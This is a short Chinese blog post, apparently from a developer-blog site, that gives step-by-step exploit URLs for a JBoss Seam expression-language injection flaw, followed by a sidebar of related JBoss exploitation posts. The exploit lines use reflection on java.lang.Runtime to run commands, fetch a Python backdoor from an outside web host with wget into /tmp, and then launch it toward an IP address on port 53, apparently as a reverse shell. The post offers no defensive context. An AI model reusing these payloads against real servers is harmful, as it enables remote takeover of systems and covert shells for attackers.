jboss seam 远程执行漏洞利用步骤

最新推荐文章于 2022-03-29 22:03:20 发布
最新推荐文章于 2022-03-29 22:03:20 发布
阅读量2.7k 收藏
点赞数
文章标签: seam jboss null perl c

目标:http://www.ip.com
http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478
http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[6]}

http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime')}.getDeclaredMethods()[13]}

http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'wget http://www.bitpress.com.cn/uploads/back.py -O

/tmp/back.py')}


home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'perl /tmp/back.py 118.122.176.42 53')}

cnbird2008
关注
JBOSS远程代码执行漏洞
huike008的博客
07-20 223
JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压。 访问http://www.abc.com.cn:8080/jmx-console/ 后台,如下图 下拉找到如下图所示 点击flavor=URL,type=DeploymentScanner进入 在输入框中写入war压缩文件webshe...
JBoss Seam Framework remote code execution
cnbird's blog
12-15 1964
Here's interesting bug I found in JBoss Seam Framework, which led to remote code execution using JBoss EL expressions. Having any sort of custom expression language in a web framework is always a sign
浅谈“Jboss远程代码执行
→_→
07-23 1295
一:漏洞名称: Jboss远程代码执行, Jboss远程命令执行 描述: JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间,中的addURL()函数,该函数可以远程下载一个war压缩包并解压。 如果压缩包里含有webshell文件,是直接可以解析的。 检测条件: 被测网站采用了JBOSS中间件架构 检测方法: 对于采用JBOSS的网站,首先判断其版本,如果版本为1.0.x版本,则可通过对其控制台的访问来判断,访问http://127.0.
JBOSS Seam框架远程代码执行漏洞
02-29 1291
(转http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html) 本文相当于翻译了这篇文章,也主要是想为自己做个笔记 该漏洞的出现主要是由于Jboss-seamFramework框架开发者在加入EL组件支持时,由于没有处理好传给由EL处理的用户数据,导致这个漏洞的产生,structs的一个版本也出现过这样的问题。 EL
JBOSS远程代码执行
swordheart的博客
03-29 828
0x00漏洞介绍 JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间,中的addURL()函数,该函数可以远程下载一个war压缩包并解压。如果压缩包里含有webshell文件,是直接可以解析的。 0x01 漏洞复现 http://192.200.30.43:8081/jmx-console/ 找到业务部署的入口,通过addurl,进行远程war包部署,访问地址:http://192.200.30.43:8081/jmx-console/HtmlAdaptor?
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
在2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
Jboss seam3 实战
03-29
标题中的“Jboss seam3 实战”表明,本文将重点介绍JBoss Seam框架的第三个版本的实际应用。JBoss Seam是一个开源的Java EE框架,它通过依赖注入和会话模型,简化了基于Java EE的企业级应用开发。Seam框架为开发者...
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
JbossSeam中文开发指南.docx
最新发布
09-19
Jboss Seam中文开发指南 Jboss Seam是基于Java EE 5.0的框架,提供了一个基于组件的架构,能够帮助开发者快速构建企业级应用程序。Seam框架提供了一个统一的编程模型,能够将JSF、EJB、JPA等技术整合在一起,提供了...
java反序列化漏洞利用工具Jboss&WebLogic;.rar
07-23
jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: we blogic回显结果测试中,稍后加入
JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) 复现
YouthBelief的博客
11-01 689
JBoss漏洞复现前言一、JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)0x01 漏洞描述0x02 影响范围0x03 漏洞利用工具直接利用0x04 漏洞修复总结 前言 使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。 一、JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149) 0x01 漏洞描述 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 Ht
远程命令执行漏洞与远程代码执行漏洞33333
zkq001002的博客
10-05 9228
远程命令执行漏洞的原理 远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端 没有针对执行函数做 过滤,导致在没有指定绝对路径的情况下就执行命令 复现示例 Tomcat任意文件上传漏洞CVE-2017-12615 介绍 ApacheTomcat服务组件中开启了http的Put方法所造成的攻击者可以利用该方法任意 上传jsp木马所造成的远程代码执行漏洞。 知默认情况下是禁止http请求...
[译]jboss漏洞利用
iteye_16188的博客
10-15 230
原文地址:http://resources.infosecinstitute.com/jboss-exploitation/ JBoss Application Server是一个基于Jave EE的web应用服务器。如果Jboss没有正确配置,它会允许攻击者进行各种恶意攻击。由于JMX console可以通过端口8080远程访问,攻击者和恶意用户可以通过使用Jboss console中的Dep...
JBoss高危漏洞分析
02-25 444
前言 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss...
JBoos漏洞及利用整理
weixin_45106410的博客
11-30 4439
CVE-2013-4810 Apache Tomcat/Jboss远程代码执行漏洞 与CVE-2015-7501漏洞原理相同,这里详细介绍一下两者的区别,其区别就在于两个漏洞选择的进行其中JMXInvokerServlet和EJBInvokerServlet利用的是org.jboss.invocation.MarshalledValue进行的反序列化操作,而web-console/Invoker利用的org.jboss.console.remote.RemoteMBeanInvocation进行反序列化并
利用JBoss漏洞拿webshell方法
热门推荐
fengling132的专栏
08-15 1万+
JBoss是一个大型应用平台,普通用户很难接触到。越是难以接触到的东西越觉得高深,借用北京公交司机李素丽的一句话“用力只能干出称职,用心才能干出优秀”,在安全上也是如此,虽然JBoss平台很难掌握,但是只要找到Jboss的罩门,一样轻松渗透,本文就如何针对Jboss的一个漏洞来获取其Webshell,由于是研究,因此仅仅点到为止。   一、信息收集与整理 1.使用漏洞特征进行搜索
WordPress Plugin Autoptimize 2.7.6 - Authenticated Arbitrary File Upload (Metasploit)
小兰同学的博客
03-19 588
本文就WP的Autoptimize 2.7.6的插件漏洞从复现到msf模块导入并利用做了简单的步骤记录。 文章目录一、漏洞详情二、漏洞复现三、metasploit利用 参考链接 https://www.exploit-db.com/exploits/49399 https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view 一、漏洞详情 WordPress插件Autoptimize容易出现多个漏洞,包括跨站点脚本和任意文件上传漏洞
CVE-2017-12149 Jboss反序列化漏洞利用工具
资源摘要信息:"Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)" 知识点详细说明: 1. Jboss Application Server概述 Jboss Application Server(简称Jboss AS)是一个开源的Java应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值